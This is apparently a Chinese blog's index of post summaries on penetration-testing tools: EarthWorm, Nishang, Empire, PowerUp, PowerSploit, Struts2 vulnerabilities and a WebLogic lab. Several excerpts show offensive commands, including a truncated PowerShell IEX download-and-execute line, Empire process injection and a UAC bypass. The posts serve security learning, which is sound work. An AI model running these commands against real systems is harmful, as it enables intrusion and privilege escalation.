摘要:简介: EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 主页: http://rootkiter.com/EarthWorm/ ew项目地址: https://github.com/idlefire/e 阅读全文
posted @ 2019-11-07 00:02 Micr067 阅读 (13) 评论 (0) 编辑
摘要:nishanhg 下载地址:https://github.com/samratashok/nishing 1.简介 nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.0 2.环境准备 阅读全文
posted @ 2019-10-26 23:12 Micr067 阅读 (289) 评论 (0) 编辑
摘要:会话注入 我们可以使用usemodule management/psinject模块来进程注入,获取权限 设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回域用户权限shell usemodule management/psinject set Li 阅读全文
posted @ 2019-10-25 23:46 Micr067 阅读 (73) 评论 (0) 编辑
摘要:权限提升 Bypass UAC usemodule powershell/privesc/bypassuac usemodule powershell/privesc/bypassuac 设置listener execute list查看 设置listener execute list查看 usem 阅读全文
posted @ 2019-10-25 00:48 Micr067 阅读 (131) 评论 (0) 编辑
摘要:0x00 简介 Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mi 阅读全文
posted @ 2019-10-24 00:50 Micr067 阅读 (444) 评论 (0) 编辑
摘要:PowerUp攻击模块实战 1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行 2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient) 阅读全文
posted @ 2019-10-22 23:45 Micr067 阅读 (71) 评论 (0) 编辑
摘要:PowerSploit PowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit 下载程序目录 阅读全文
posted @ 2019-10-22 00:12 Micr067 阅读 (45) 评论 (0) 编辑
摘要:Windows powershell是一种命令行外壳程序和脚本环境,它内置在win7以上版本的操作系统中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。powershell程序可以直接在内存中运行,可以作为命令提示符cmd.exe的扩充。 查看powershell版本信息 阅读全文
posted @ 2019-10-22 00:08 Micr067 阅读 (111) 评论 (0) 编辑
摘要:Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-0 阅读全文
posted @ 2019-10-06 09:45 Micr067 阅读 (54) 评论 (0) 编辑
摘要:使用docker搭建漏洞测试环境 micr067@test:~/vulhub/weblogic/CVE-2018-2894$ sudo docker-compose build weblogic uses an image, skipping micr067@test:~/vulhub/weblog 阅读全文
posted @ 2019-09-29 20:47 Micr067 阅读 (80) 评论 (0) 编辑